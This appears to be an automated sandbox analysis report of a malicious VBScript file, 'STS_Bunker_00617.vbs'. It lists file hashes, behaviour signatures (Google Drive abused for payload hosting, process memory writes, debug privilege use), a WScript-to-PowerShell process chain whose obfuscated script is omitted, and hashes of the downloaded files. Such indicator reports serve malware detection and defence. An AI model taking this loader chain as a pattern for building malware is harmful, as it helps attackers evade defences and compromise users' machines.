Analysis
max time kernel: 142s
max time network: 147s
platform: windows10-2004_x64
resource: win10v2004-20240508-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
submitted: 18-06-2024 09:36
Static task: static1
Behavioral task: behavioral1
  Sample: STS_Bunker_00617.vbs
  Resource: win7-20240611-en
Behavioral task: behavioral2
  Sample: STS_Bunker_00617.vbs
  Resource: win10v2004-20240508-en
General
Target: STS_Bunker_00617.vbs
Size: 92KB
MD5: dfe2a23100ac3263583e69f48e9b32e6
SHA1: 20087641aba69eaaaef0f87a7d21edd8a255db60
SHA256: 9aa64f43d090ff657848da74a0c2ea1f3211fa1d88ac3fa603e65d724360a957
SHA512: 48b5bf8605415ead17d375adc9613b73f8e3f80132086f2a3ef11df7684e1d43ad4f97aee65967986a9964d81edcd7043d7faaf720fcd1f73052411d43153038
SSDEEP: 1536:V01/LsA0DnkdzhX7RXaSMmr2rFHxsASgxWxCwhrdM5eW8VLOExkzL:V09LB0DnWzhX7RXaSMxhxsAhWEwhrdMh
Malware Config
Signatures
- Legitimate hosting services abused for malware hosting/C2 (1 TTP, 9 IoCs)
  flow  ioc
  7     drive.google.com
  16    drive.google.com
  18    drive.google.com
  20    drive.google.com
  19    drive.google.com
  3     drive.google.com
  13    drive.google.com
  15    drive.google.com
  17    drive.google.com
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes: powershell.exe
  pid   process
  4408  powershell.exe
  4408  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: powershell.exe
  description               pid   process
  Token: SeDebugPrivilege   4408  powershell.exe
- Suspicious use of WriteProcessMemory (4 IoCs)
  Processes: WScript.exe, powershell.exe
  description                        pid   process         target process
  PID 1996 wrote to memory of 4408   1996  WScript.exe     powershell.exe
  PID 1996 wrote to memory of 4408   1996  WScript.exe     powershell.exe
  PID 4408 wrote to memory of 4396   4408  powershell.exe  cmd.exe
  PID 4408 wrote to memory of 4396   4408  powershell.exe  cmd.exe
Processes
- C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\STS_Bunker_00617.vbs"
  - Suspicious use of WriteProcessMemory
  PID: 1996
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -windowstyle 1 "[obfuscated script body omitted]"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 4408
    - C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cystenchyme.aan && echo t"
      PID: 4396
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 792B
  MD5: d91ce4da3b1a3c26df2a00c44c53bbe8
  SHA1: dc2a78ace203c8f7908f80f6b4fb9f47cc174d30
  SHA256: 28aea483fa1a2e3c89e58b111b01dd34b52fec05e0792b757559b1de466f3eef
  SHA512: cc9658970733f0896884d10887a9d836ed7a14d864e11dc27c680e88add5334336c511cda74e6a60ba3753ff9cb831e3f9cf545991b69b2c47b5485c2dada04f
- Filesize: 9KB
  MD5: 156d56579b5db937b0907bdec53b1200
  SHA1: 91ac0a4b3e61d03ecd75d56d61cbb5d865513aac
  SHA256: ebfebe0e9db1e24b69cb3e25652b7b094c0469b49925a48666a67619d63cc544
  SHA512: 6ab930b6d545593fe57ffe8097f2066af9eee4b7afa6f794da0f79dfd67cd468c31806858d39bbe0491a7b8cf47120873648e211c54c07159a366443fad05a94
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82